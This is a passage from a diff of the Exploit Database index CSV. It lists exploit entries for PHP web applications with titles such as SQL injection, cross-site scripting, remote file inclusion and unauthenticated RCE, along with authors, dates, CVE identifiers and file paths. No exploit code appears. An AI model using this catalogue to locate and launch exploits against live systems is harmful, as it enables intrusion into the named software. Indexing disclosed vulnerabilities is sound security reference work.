32516,exploits/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",webapps,php,80,2014-03-26,2014-03-26,1,CVE-2014-2531;OSVDB-104944,,,,,
27003,exploits/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-01,2013-07-22,1,CVE-2006-0088;OSVDB-22382,,,,,https://www.securityfocus.com/bid/16110/info
11481,exploits/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-16,,1,,,,,,
52263,exploits/php/webapps/52263.py,"Inventio Lite 4 - SQL Injection",2025-04-18,pointedsec,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-44541,,,,,
37974,exploits/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,webapps,php,,2012-10-26,2015-08-26,1,,,,,,https://www.securityfocus.com/bid/56293/info
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,,2019-09-06,2019-09-06,0,,,,,,
18022,exploits/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",webapps,php,,2011-10-23,2011-10-23,0,OSVDB-83422,,,,http://www.exploit-db.cominverseflow.zip,
@ -22511,6 +22516,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2979,exploits/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,webapps,php,,2006-12-21,2016-11-24,1,OSVDB-32444;CVE-2008-1635;CVE-2006-6764;OSVDB-32443;OSVDB-32442;CVE-2006-6763,,,,http://www.exploit-db.comkisgb-v5.0.0.zip,
3278,exploits/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,webapps,php,,2007-02-05,2016-09-27,1,OSVDB-35831;CVE-2007-0826,,,,http://www.exploit-db.comKisiselSite2007.zip,
32983,exploits/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,webapps,php,80,2014-04-22,2014-04-22,0,OSVDB-106179;CVE-2014-3757,,,,http://www.exploit-db.comkitForm_0.43.zip,
52265,exploits/php/webapps/52265.py,"KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection",2025-04-18,samogod,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-11728,,,,,
8885,exploits/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
8884,exploits/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
51859,exploits/php/webapps/51859.txt,"kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition",2024-03-05,"Mohammad Reza Omrani",webapps,php,,2024-03-05,2024-03-05,0,,,,,,
@ -30908,6 +30914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
52260,exploits/php/webapps/52260.py,"Tatsu 3.3.11 - Unauthenticated RCE",2025-04-18,"Milad karimi",webapps,php,,2025-04-18,2025-04-18,0,CVE-2021-25094,,,,,
34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
43543,exploits/php/webapps/43543.txt,"Taxi Booking Script 1.0 - Cross-site Scripting",2018-01-12,Tauco,webapps,php,,2018-01-12,2018-01-12,0,,,,,,

Can't render this file because it is too large.